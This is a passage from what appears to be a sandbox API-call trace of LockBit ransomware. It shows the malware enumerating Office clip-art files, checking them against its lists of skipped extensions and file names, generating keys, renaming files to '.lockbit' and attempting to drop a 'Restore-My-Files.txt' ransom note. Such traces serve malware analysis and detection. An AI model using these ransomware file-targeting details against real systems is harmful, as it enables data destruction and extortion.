returned 0x0 [0101.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.316] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.318] malloc (_Size=0xa6) returned 0x77d800 [0101.319] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.319] free (_Block=0x77d800) [0101.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.320] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.320] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc6c400, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedc6c400, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00142_.GIF", cAlternateFileName="")) returned 1 [0101.320] lstrcmpiW (lpString1=".", lpString2="AG00142_.GIF") returned -1 [0101.320] lstrcmpiW (lpString1="..", lpString2="AG00142_.GIF") returned -1 [0101.320] PathFindExtensionW (pszPath="AG00142_.GIF") returned=".GIF" [0101.320] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.320] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.320] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.320] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.320] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.321] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.321] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.322] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.322] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00142_.GIF") returned 1 [0101.322] lstrcmpiW (lpString1="ntldr", lpString2="AG00142_.GIF") returned 1 [0101.322] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00142_.GIF") returned 1 [0101.322] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00142_.GIF") returned 1 [0101.322] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00142_.GIF") returned 1 [0101.323] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00142_.GIF") returned 1 [0101.323] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00142_.GIF") returned 1 [0101.323] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.323] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned=".GIF" [0101.323] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.323] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.323] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.323] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.323] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.324] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.324] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.lockbit") returned 72 [0101.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xa54 [0101.325] CreateIoCompletionPort (FileHandle=0xa54, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.325] malloc (_Size=0x40068) returned 0x3ef0008 [0101.325] GetFileSizeEx (in: hFile=0xa54, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=15308) returned 1 [0101.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0101.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0101.330] ReadFile (in: hFile=0xa54, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.343] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.343] malloc (_Size=0xa6) returned 0x77d800 [0101.343] NtSetInformationFile (FileHandle=0xa54, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.344] free (_Block=0x77d800) [0101.344] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.344] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.344] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.344] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9688900, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9688900, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00154_.GIF", cAlternateFileName="")) returned 1 [0101.344] lstrcmpiW (lpString1=".", lpString2="AG00154_.GIF") returned -1 [0101.344] lstrcmpiW (lpString1="..", lpString2="AG00154_.GIF") returned -1 [0101.344] PathFindExtensionW (pszPath="AG00154_.GIF") returned=".GIF" [0101.344] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.345] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.345] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.346] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.346] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.346] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.346] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.346] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.346] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="ntldr", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00154_.GIF") returned 1 [0101.347] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00154_.GIF") returned 1 [0101.347] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.347] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned=".GIF" [0101.347] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.347] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.347] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.347] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.347] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.347] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.348] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.348] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.348] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.lockbit") returned 72 [0101.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xa50 [0101.349] CreateIoCompletionPort (FileHandle=0xa50, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.349] malloc (_Size=0x40068) returned 0x1ff1e60 [0101.349] GetFileSizeEx (in: hFile=0xa50, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5315) returned 1 [0101.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0101.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0101.353] ReadFile (in: hFile=0xa50, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.368] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.368] malloc (_Size=0xa6) returned 0x77d800 [0101.368] NtSetInformationFile (FileHandle=0xa50, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.369] free (_Block=0x77d800) [0101.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.369] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.369] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2417b00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2417b00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00157_.GIF", cAlternateFileName="")) returned 1 [0101.369] lstrcmpiW (lpString1=".", lpString2="AG00157_.GIF") returned -1 [0101.369] lstrcmpiW (lpString1="..", lpString2="AG00157_.GIF") returned -1 [0101.369] PathFindExtensionW (pszPath="AG00157_.GIF") returned=".GIF" [0101.369] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.369] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.369] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.369] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.369] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.369] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.369] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.369] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.369] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.370] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.370] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.371] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.371] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="ntldr", lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="ntuser.dat.log", 